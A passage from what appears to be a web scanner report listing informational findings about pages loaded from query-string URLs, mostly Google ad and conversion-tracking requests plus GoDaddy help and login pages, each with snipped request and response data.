The page was loaded from a URL containing a query string:http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3796773913386149&output=html&h=250&slotname=1161958565&w=300&lmt=1316226345&flash=10.3.183&url=http%3A%2F%2Fportal.opera.com%2Fportal%2Ftabs%2F%3Ftab_name%3DOpera%2520Portal&dt=1316208345291&bpp=83&shv=r20110907&jsv=r20110914&correlator=1316208345376&frm=4&adk=265923585&ga_vid=1095286181.1316208009&ga_sid=1316208009&ga_hid=29688395&ga_fc=1&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=12&biw=1131&bih=870&eid=36887101&ref=http%3A%2F%2Fportal.opera.com%2Fportal%2Ftabs%2F%3Ftab_name%3DNews&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=89&xpc=BpvUCbRbcD&p=http%3A//portal.opera.com http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png http://pagead2.googlesyndication.com/pagead/imgad?id=COXy9IKJpciyAhCsAhj6ATII9S-En_w6q90 http://pagead2.googlesyndication.com/pagead/js/r20110907/r20110914/abg.js http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://portal.opera.com/portal/tabs/%253Ftab_name%253DOpera%252520Portal%26hl%3Den%26client%3Dca-pub-3796773913386149%26adU%3Dwww.zoosk.com%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNE-hVbM3OcT1ALmR8Zysmx0bogKQw
Request
GET /pagead/ads?client=ca-pub-3796773913386149&output=html&h=250&slotname=1161958565&w=300&lmt=1316226345&flash=10.3.183&url=http%3A%2F%2Fportal.opera.com%2Fportal%2Ftabs%2F%3Ftab_name%3DOpera%2520Portal&dt=1316208345291&bpp=83&shv=r20110907&jsv=r20110914&correlator=1316208345376&frm=4&adk=265923585&ga_vid=1095286181.1316208009&ga_sid=1316208009&ga_hid=29688395&ga_fc=1&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=12&biw=1131&bih=870&eid=36887101&ref=http%3A%2F%2Fportal.opera.com%2Fportal%2Ftabs%2F%3Ftab_name%3DNews&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=89&xpc=BpvUCbRbcD&p=http%3A//portal.opera.com HTTP/1.1.net/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK/googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"=function(a){window.sta...[SNIP]... ;left:0px;z-index:1001"><OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="google_flash_obj" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" WIDTH="300" HEIGHT="250"> <PARAM NAME=movie VALUE="http://pagead2.googlesyndication.com/pagead/imgad?id=COXy9IKJpciyAhCsAhj6ATII9S-En_w6q90">...[SNIP]... _0pVXanofzXc33vPtsAg6CeVrIj3Q%26client%3Dca-pub-3796773913386149%26adurl%3Dhttp://www.Zoosk.com/d/dating2/35/%253Ffrom%253DAW_M0_WW_03_US*000781-007617-000014_portal.opera.com"><EMBED src="http://pagead2.googlesyndication.com/pagead/imgad?id=COXy9IKJpciyAhCsAhj6ATII9S-En_w6q90" id="google_flash_embed" WIDTH="300" HEIGHT="250" WMODE="opaque" FlashVars="clickTAG=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBmem5WnhzTrfOAdGIgAL7obH6BuO-kIkC2-aPux2zgsqyUbDjLRABGAEgsLnXBjgAUIzepz5gyQagAcn29-4DsgEQcG9ydGFsLm9wZXJhLmNvbboBCjMwMHgyNTBfYXPIAQTaATxodHRwOi8vcG9ydGFsLm9wZXJhLmNvbS9wb3J0YWwvdGFicy8_dGFiX25hbWU9T3BlcmElMjBQb3J0YWz4AQGAAgG4AhjAAgHIApvs9hKoAwHoA4wD6AOdCegD0wH1AwAIAAH1AzAAAACgBgQ%26num%3D1%26sig%3DAOD64_0pVXanofzXc33vPtsAg6CeVrIj3Q%26client%3Dca-pub-3796773913386149%26adurl%3Dhttp://www.Zoosk.com/d/dating2/35/%253Ffrom%253DAW_M0_WW_03_US*000781-007617-000014_portal.opera.com" TYPE="application/x-shockwave-flash" AllowScriptAccess="never" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer"> </EMBED>...[SNIP]... <img src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png' alt="(i)" border=0 height=15px width=19px/> </div><div id=abgs><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://portal.opera.com/portal/tabs/%253Ftab_name%253DOpera%252520Portal%26hl%3Den%26client%3Dca-pub-3796773913386149%26adU%3Dwww.zoosk.com%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNE-hVbM3OcT1ALmR8Zysmx0bogKQw" target=_blank> <img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/> </a>...[SNIP]... <script src="http://pagead2.googlesyndication.com/pagead/js/r20110907/r20110914/abg.js"> </script>...[SNIP]...
15.17. http://googleads.g.doubleclick.net/pagead/ads
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://googleads.g.doubleclick.net
Path:
/pagead/ads
Issue detail
The page was loaded from a URL containing a query string:http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5747035432214533&output=html&h=600&slotname=9883505063&w=160&lmt=1316207685&flash=10.3.183&url=http%3A%2F%2Fwww.bookkeepers.com.au%2F&dt=1316207735990&bpp=4169&shv=r20110907&jsv=r20110914&prev_slotnames=3706610610&correlator=1316207740186&frm=4&adk=1010463903&ga_vid=2016915880.1316207740&ga_sid=1316207740&ga_hid=167560056&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=12&adx=810&ady=390&biw=1131&bih=870&eid=44901218%2C36887102&ref=http%3A%2F%2Fwww.visisearch.com%2F&prodhost=googleads.g.doubleclick.net&fu=0&ifi=2&dtd=8217&xpc=cF1oLRyU5D&p=http%3A//www.bookkeepers.com.au http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png http://pagead2.googlesyndication.com/pagead/sma8.js http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.bookkeepers.com.au/%26hl%3Den%26client%3Dca-pub-5747035432214533%26adU%3Dwww.appliededucation.com.au%26adT%3DBookkeeping%2BAnd%2BPayroll%26adU%3Dwww.scitraining.com%26adT%3DBookkeeping%2BCourses%26adU%3DGoodAccountants.com/Local-Services%26adT%3DNeed%2BA%2BGood%2BBookkeeper%253F%26adU%3Dwww.CampusExplorer.com%26adT%3DStudy%2BBookkeeping%26adU%3Dwww.QuickBooksOnline.com%26adT%3DEasy%2BBookkeeping%26gl%3DUS&usg=AFQjCNGAx7fqIbB1_Ot9F--XB2cyJC1FhA
Request
GET /pagead/ads?client=ca-pub-5747035432214533&output=html&h=600&slotname=9883505063&w=160&lmt=1316207685&flash=10.3.183&url=http%3A%2F%2Fwww.bookkeepers.com.au%2F&dt=1316207735990&bpp=4169&shv=r20110907&jsv=r20110914&prev_slotnames=3706610610&correlator=1316207740186&frm=4&adk=1010463903&ga_vid=2016915880.1316207740&ga_sid=1316207740&ga_hid=167560056&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=12&adx=810&ady=390&biw=1131&bih=870&eid=44901218%2C36887102&ref=http%3A%2F%2Fwww.visisearch.com%2F&prodhost=googleads.g.doubleclick.net&fu=0&ifi=2&dtd=8217&xpc=cF1oLRyU5D&p=http%3A//www.bookkeepers.com.au HTTP/1.1.net/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK/googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"{color:#0000ff}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var...[SNIP]... :absolute;top:1px"><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.bookkeepers.com.au/%26hl%3Den%26client%3Dca-pub-5747035432214533%26adU%3Dwww.appliededucation.com.au%26adT%3DBookkeeping%2BAnd%2BPayroll%26adU%3Dwww.scitraining.com%26adT%3DBookkeeping%2BCourses%26adU%3DGoodAccountants.com/Local-Services%26adT%3DNeed%2BA%2BGood%2BBookkeeper%253F%26adU%3Dwww.CampusExplorer.com%26adT%3DStudy%2BBookkeeping%26adU%3Dwww.QuickBooksOnline.com%26adT%3DEasy%2BBookkeeping%26gl%3DUS&usg=AFQjCNGAx7fqIbB1_Ot9F--XB2cyJC1FhA" target=_blank> <img alt="AdChoices" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png" > </a>...[SNIP]... <script src="http://pagead2.googlesyndication.com/pagead/sma8.js"> </script>...[SNIP]...
15.18. http://googleads.g.doubleclick.net/pagead/ads
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://googleads.g.doubleclick.net
Path:
/pagead/ads
Issue detail
The page was loaded from a URL containing a query string:http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5747035432214533&output=html&h=90&slotname=3706610610&w=728&lmt=1316207685&flash=10.3.183&url=http%3A%2F%2Fwww.bookkeepers.com.au%2F&dt=1316207735903&bpp=17&shv=r20110907&jsv=r20110914&correlator=1316207740186&frm=4&adk=1292839352&ga_vid=2016915880.1316207740&ga_sid=1316207740&ga_hid=167560056&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=12&biw=1131&bih=870&eid=44901218%2C36887101&ref=http%3A%2F%2Fwww.visisearch.com%2F&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=4464&xpc=xZLYf81nzv&p=http%3A//www.bookkeepers.com.au http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png http://pagead2.googlesyndication.com/pagead/sma8.js http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.bookkeepers.com.au/%26hl%3Den%26client%3Dca-pub-5747035432214533%26adU%3DColleges.CampusCorner.com%26adT%3DBookkeeping%2BSchools%26adU%3Dwww.PennFoster.edu%26adT%3DBookkeeping%2BTraining%26adU%3DBooks2Taxes.com%26adT%3DBookkeeping%2BService%2B%25247/hr%26gl%3DUS&usg=AFQjCNHdgKLycorz_yAkLboGcDc0034bjA
Request
GET /pagead/ads?client=ca-pub-5747035432214533&output=html&h=90&slotname=3706610610&w=728&lmt=1316207685&flash=10.3.183&url=http%3A%2F%2Fwww.bookkeepers.com.au%2F&dt=1316207735903&bpp=17&shv=r20110907&jsv=r20110914&correlator=1316207740186&frm=4&adk=1292839352&ga_vid=2016915880.1316207740&ga_sid=1316207740&ga_hid=167560056&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=12&biw=1131&bih=870&eid=44901218%2C36887101&ref=http%3A%2F%2Fwww.visisearch.com%2F&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=4464&xpc=xZLYf81nzv&p=http%3A//www.bookkeepers.com.au HTTP/1.1.net/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK/googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"{color:#0000ff}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var...[SNIP]... :absolute;top:2px"><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.bookkeepers.com.au/%26hl%3Den%26client%3Dca-pub-5747035432214533%26adU%3DColleges.CampusCorner.com%26adT%3DBookkeeping%2BSchools%26adU%3Dwww.PennFoster.edu%26adT%3DBookkeeping%2BTraining%26adU%3DBooks2Taxes.com%26adT%3DBookkeeping%2BService%2B%25247/hr%26gl%3DUS&usg=AFQjCNHdgKLycorz_yAkLboGcDc0034bjA" target=_blank> <img alt="AdChoices" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png" > </a>...[SNIP]... <script src="http://pagead2.googlesyndication.com/pagead/sma8.js"> </script>...[SNIP]...
15.19. http://googleads.g.doubleclick.net/pagead/ads
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://googleads.g.doubleclick.net
Path:
/pagead/ads
Issue detail
The page was loaded from a URL containing a query string:http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3796773913386149&output=html&h=250&slotname=1161958565&w=300&lmt=1316226341&flash=10.3.183&url=http%3A%2F%2Fportal.opera.com%2Fportal%2Ftabs%2F%3Ftab_name%3DNews&dt=1316208341657&bpp=148&shv=r20110907&jsv=r20110914&correlator=1316208341881&frm=4&adk=265923585&ga_vid=1095286181.1316208009&ga_sid=1316208009&ga_hid=320694430&ga_fc=1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=12&adx=739&ady=181&biw=1131&bih=870&eid=36887102&ref=http%3A%2F%2Fportal.opera.com%2F&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=240&xpc=Nxfq0ro1Gs&p=http%3A//portal.opera.com http://d3.zedo.com/jsc/d3/ff2.html?n=1133;c=173;s=24;d=9;w=300;h=250;l=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B1e2aV3hzTu3fNNGGgAKz09XuBsL17uACur-rqCqi06q2TbDqARABGAEgsLnXBjgAUIWt2Zv9_____wFgyQagAY6tjM0DsgEQcG9ydGFsLm9wZXJhLmNvbboBCjMwMHgyNTBfYXPIAQnaATJodHRwOi8vcG9ydGFsLm9wZXJhLmNvbS9wb3J0YWwvdGFicy8_dGFiX25hbWU9TmV3c7gCGMACAcgCmofBIKgDAegDjAPoA8QH6AMQ6AOdCegDpQH1AwAIAAD1AzAAgAGgBhE&num=1&sig=AOD64_3w5cVII6c9Oj6InkJ2H7wJTjrD-A&client=ca-pub-3796773913386149&adurl= http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png http://pagead2.googlesyndication.com/pagead/js/r20110907/r20110914/abg.js http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://portal.opera.com/portal/tabs/%253Ftab_name%253DNews%26hl%3Den%26client%3Dca-pub-3796773913386149%26adU%3Dhealthheadlines.com%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNF6W_9HhFuuqreLGXyyKSTgZcgLLA
Request
GET /pagead/ads?client=ca-pub-3796773913386149&output=html&h=250&slotname=1161958565&w=300&lmt=1316226341&flash=10.3.183&url=http%3A%2F%2Fportal.opera.com%2Fportal%2Ftabs%2F%3Ftab_name%3DNews&dt=1316208341657&bpp=148&shv=r20110907&jsv=r20110914&correlator=1316208341881&frm=4&adk=265923585&ga_vid=1095286181.1316208009&ga_sid=1316208009&ga_hid=320694430&ga_fc=1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=12&adx=739&ady=181&biw=1131&bih=870&eid=36887102&ref=http%3A%2F%2Fportal.opera.com%2F&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=240&xpc=Nxfq0ro1Gs&p=http%3A//portal.opera.com HTTP/1.1.net/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK/googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"<iframe src="http://d3.zedo.com/jsc/d3/ff2.html?n=1133;c=173;s=24;d=9;w=300;h=250;l=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B1e2aV3hzTu3fNNGGgAKz09XuBsL17uACur-rqCqi06q2TbDqARABGAEgsLnXBjgAUIWt2Zv9_____wFgyQagAY6tjM0DsgEQcG9ydGFsLm9wZXJhLmNvbboBCjMwMHgyNTBfYXPIAQnaATJodHRwOi8vcG9ydGFsLm9wZXJhLmNvbS9wb3J0YWwvdGFicy8_dGFiX25hbWU9TmV3c7gCGMACAcgCmofBIKgDAegDjAPoA8QH6AMQ6AOdCegDpQH1AwAIAAD1AzAAgAGgBhE&num=1&sig=AOD64_3w5cVII6c9Oj6InkJ2H7wJTjrD-A&client=ca-pub-3796773913386149&adurl=" frameborder=0 marginheight=0 marginwidth=0 scrolling="no" allowTransparency="true" width=300 height=250> </iframe>...[SNIP]... <img src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png' alt="(i)" border=0 height=15px width=19px/> </div><div id=abgs><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://portal.opera.com/portal/tabs/%253Ftab_name%253DNews%26hl%3Den%26client%3Dca-pub-3796773913386149%26adU%3Dhealthheadlines.com%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNF6W_9HhFuuqreLGXyyKSTgZcgLLA" target=_blank> <img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/> </a>...[SNIP]... <script src="http://pagead2.googlesyndication.com/pagead/js/r20110907/r20110914/abg.js"> </script>...[SNIP]...
15.20. http://googleads.g.doubleclick.net/pagead/ads
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://googleads.g.doubleclick.net
Path:
/pagead/ads
Issue detail
The page was loaded from a URL containing a query string:http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3796773913386149&output=html&h=250&slotname=1161958565&w=300&lmt=1316226009&flash=10.3.183&url=http%3A%2F%2Fportal.opera.com%2F&dt=1316208008700&bpp=201&shv=r20110907&jsv=r20110914&correlator=1316208009033&frm=4&adk=265923585&ga_vid=1095286181.1316208009&ga_sid=1316208009&ga_hid=212708364&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=12&biw=1131&bih=870&eid=36887101&ref=http%3A%2F%2Fwww.opera.com%2Fcompany%2F&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=423&xpc=B211ORtJZa&p=http%3A//portal.opera.com http://d3.zedo.com/jsc/d3/ff2.html?n=1133;c=173;s=24;d=9;w=300;h=250;l=http://adclick.g.doubleclick.net/aclk?sa=l&ai=BEX0mCndzTsf0DcOJgALUrb3-BsL17uACur-rqCqi06q2TaCNBhABGAEgsLnXBjgAUIWt2Zv9_____wFgyQagAY6tjM0DsgEQcG9ydGFsLm9wZXJhLmNvbboBCjMwMHgyNTBfYXPIAQnaARhodHRwOi8vcG9ydGFsLm9wZXJhLmNvbS-4AhjAAgHIApqHwSCoAwHoA6UB6AMQ6AONA_UDAAgAAPUDMgCAAaAGEQ&num=1&sig=AOD64_2ztssrmiGfz4QREAFMwUEJdXtTPw&client=ca-pub-3796773913386149&adurl= http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png http://pagead2.googlesyndication.com/pagead/js/r20110907/r20110914/abg.js http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://portal.opera.com/%26hl%3Den%26client%3Dca-pub-3796773913386149%26adU%3Dhealthheadlines.com%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNEnO7vFGFDZjixv_uN-otcKDOp9dQ
Request
GET /pagead/ads?client=ca-pub-3796773913386149&output=html&h=250&slotname=1161958565&w=300&lmt=1316226009&flash=10.3.183&url=http%3A%2F%2Fportal.opera.com%2F&dt=1316208008700&bpp=201&shv=r20110907&jsv=r20110914&correlator=1316208009033&frm=4&adk=265923585&ga_vid=1095286181.1316208009&ga_sid=1316208009&ga_hid=212708364&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=12&biw=1131&bih=870&eid=36887101&ref=http%3A%2F%2Fwww.opera.com%2Fcompany%2F&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=423&xpc=B211ORtJZa&p=http%3A//portal.opera.com HTTP/1.1.net/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK/googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"<iframe src="http://d3.zedo.com/jsc/d3/ff2.html?n=1133;c=173;s=24;d=9;w=300;h=250;l=http://adclick.g.doubleclick.net/aclk?sa=l&ai=BEX0mCndzTsf0DcOJgALUrb3-BsL17uACur-rqCqi06q2TaCNBhABGAEgsLnXBjgAUIWt2Zv9_____wFgyQagAY6tjM0DsgEQcG9ydGFsLm9wZXJhLmNvbboBCjMwMHgyNTBfYXPIAQnaARhodHRwOi8vcG9ydGFsLm9wZXJhLmNvbS-4AhjAAgHIApqHwSCoAwHoA6UB6AMQ6AONA_UDAAgAAPUDMgCAAaAGEQ&num=1&sig=AOD64_2ztssrmiGfz4QREAFMwUEJdXtTPw&client=ca-pub-3796773913386149&adurl=" frameborder=0 marginheight=0 marginwidth=0 scrolling="no" allowTransparency="true" width=300 height=250> </iframe>...[SNIP]... <img src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png' alt="(i)" border=0 height=15px width=19px/> </div><div id=abgs><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://portal.opera.com/%26hl%3Den%26client%3Dca-pub-3796773913386149%26adU%3Dhealthheadlines.com%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNEnO7vFGFDZjixv_uN-otcKDOp9dQ" target=_blank> <img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/> </a>...[SNIP]... <script src="http://pagead2.googlesyndication.com/pagead/js/r20110907/r20110914/abg.js"> </script>...[SNIP]...
15.21. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1071433059/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://googleads.g.doubleclick.net
Path:
/pagead/viewthroughconversion/1071433059/
Issue detail
The page was loaded from a URL containing a query string:http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1071433059/?random=1316205016181&cv=6&fst=1316205016181&num=1&fmt=1&value=1200&label=6N1uCOmL7QEQ44rz_gM&bg=ffffff&hl=en&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_his=7&u_tz=-300&u_java=true&u_nplug=20&u_nmime=100&ref=http%3A//www.port25.com/products/prod_eval.html&url=http%3A//www.port25.com/products/prod_evalthanks.html&ctc_id=CAEVAQAAAB0BAAAA&ct_cookie_present=true https://services.google.com/sitestats/en.html?cid=1071433059
Request
GET /pagead/viewthroughconversion/1071433059/?random=1316205016181&cv=6&fst=1316205016181&num=1&fmt=1&value=1200&label=6N1uCOmL7QEQ44rz_gM&bg=ffffff&hl=en&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_his=7&u_tz=-300&u_java=true&u_nplug=20&u_nmime=100&ref=http%3A//www.port25.com/products/prod_eval.html&url=http%3A//www.port25.com/products/prod_evalthanks.html&ctc_id=CAEVAQAAAB0BAAAA&ct_cookie_present=true HTTP/1.1.net/products/prod_evalthanks.html/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK/googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"<font style="font-size:11px" face="arial,sans-serif" color="#000000">Google Site Stats - <a href="https://services.google.com/sitestats/en.html?cid=1071433059" target="_blank"> learn more</a>...[SNIP]...
15.22. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1072356810/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://googleads.g.doubleclick.net
Path:
/pagead/viewthroughconversion/1072356810/
Issue detail
The page was loaded from a URL containing a query string:http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1072356810/?random=1316207703039&cv=6&fst=1316207703039&num=1&fmt=1&value=1&label=VwKaCN7ZUBDKu6v_Aw&bg=ffffff&hl=en&gl=US&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_his=6&u_tz=-300&u_java=true&u_nplug=20&u_nmime=100&ref=http%3A//www.altn.com/Downloads/&url=http%3A//www.altn.com/Downloads/FreeEvaluation/&ctc_id=CAEVAQAAAB0BAAAA&ct_cookie_present=true https://services.google.com/sitestats/en_US.html?cid=1072356810
Request
GET /pagead/viewthroughconversion/1072356810/?random=1316207703039&cv=6&fst=1316207703039&num=1&fmt=1&value=1&label=VwKaCN7ZUBDKu6v_Aw&bg=ffffff&hl=en&gl=US&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_his=6&u_tz=-300&u_java=true&u_nplug=20&u_nmime=100&ref=http%3A//www.altn.com/Downloads/&url=http%3A//www.altn.com/Downloads/FreeEvaluation/&ctc_id=CAEVAQAAAB0BAAAA&ct_cookie_present=true HTTP/1.1.net/Downloads/FreeEvaluation//xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK/googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"<font style="font-size:11px" face="arial,sans-serif" color="#000000">Google Site Stats - <a href="https://services.google.com/sitestats/en_US.html?cid=1072356810" target="_blank"> learn more</a>...[SNIP]...
15.23. http://help.securepaynet.net/topic/168/article/5246
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://help.securepaynet.net
Path:
/topic/168/article/5246
Issue detail
The page was loaded from a URL containing a query string:http://help.securepaynet.net/topic/168/article/5246?plid= http://img.secureserver.net/image.aspx?page=%2Farticle%2F5246&site=help.securepaynet.net&server=m1plgdhelp005&querystring=plid%3D&status=200&article_id=5246&locale=en&topic_id=168 http://www.adobe.com/
Request
GET /topic/168/article/5246?plid= HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK...[SNIP]... <a href="http://www.adobe.com"> Adobe's website</a>...[SNIP]... <img src="//img.secureserver.net/image.aspx?page=%2Farticle%2F5246&site=help.securepaynet.net&server=m1plgdhelp005&querystring=plid%3D&status=200&article_id=5246&locale=en&topic_id=168" class="gdti" border="0" width="1" height="1" style="width: 1px; height: 1px; border: 0; margin: 0; padding: 0; position: absolute; top: 1em; left: 0.5em;" alt="" /> ...[SNIP]...
15.24. https://idp.godaddy.com/login.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://idp.godaddy.com
Path:
/login.aspx
Issue detail
The page was loaded from a URL containing a query string:https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB181&target=http%3A%2F%2Fwww.godaddy.com%2F https://email.secureserver.net/ https://imagesak.securepaynet.net/assets/spc_ffffff.gif https://imagesak.securepaynet.net/assets/spc_transparent.gif https://imagesak.securepaynet.net/idp/CSS/sso.css https://imagesak.securepaynet.net/idp/css/1.css https://imagesak.securepaynet.net/sso/gd/imgs/favicon.ico https://img2.wsimg.com/pc_css/1/gd_20110906_https.min.css https://img3.wsimg.com/AtlantisScripts/jquery/jquery-1.3.1.min.js https://img3.wsimg.com/idp/script/Fastball_Lib.js?version=1 https://img3.wsimg.com/pc/js/1/gd_js_20110817.min.js https://login.secureserver.net/index.php https://login.secureserver.net/index.php?ci=17195&prog_id=GoDaddy&app=wbe
Request
